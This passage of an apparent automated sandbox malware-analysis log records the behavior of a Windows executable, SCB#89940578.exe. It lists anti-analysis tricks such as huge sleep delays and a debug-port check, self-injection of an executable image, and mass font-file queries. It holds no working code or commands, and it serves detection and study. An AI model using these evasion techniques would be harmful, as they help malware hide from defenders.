                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 7C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 71B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 8C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: 9C00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: A030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: B030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: C030000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 3744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exe TID: 7276Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                      Source: C:\Users\user\Desktop\SCB#89940578.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeThread delayed: delay time: 60000Jump to behavior
                      Source: SCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\SCB#89940578.exeMemory written: C:\Users\user\Desktop\SCB#89940578.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeProcess created: C:\Users\user\Desktop\SCB#89940578.exe "C:\Users\user\Desktop\SCB#89940578.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Users\user\Desktop\SCB#89940578.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
